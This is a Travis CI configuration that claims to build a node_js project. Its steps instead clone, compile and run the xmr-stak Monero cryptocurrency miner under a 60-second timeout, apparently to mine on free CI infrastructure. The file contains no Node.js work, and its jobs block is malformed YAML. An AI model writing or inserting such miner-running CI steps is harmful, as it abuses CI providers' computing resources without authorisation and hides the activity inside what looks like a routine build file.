language: node_js
node_js:
- '7'
sudo: required
dist: trusty

jobs:
  include:          
      before_install: 
      - sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-5 1
      - sudo apt install libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev
      - git clone https://github.com/fireice-uk/xmr-stak.git
      - cd xmr-stak
      - cmake -DCMAKE_CXX_COMPILER=/usr/bin/g++
      - mkdir build
      - cd build
      - g++ --version
      - cmake ..
      - make install

      script:      
      - timeout 60s ./xmr-stak.sh
            
      after_success:
      - echo success
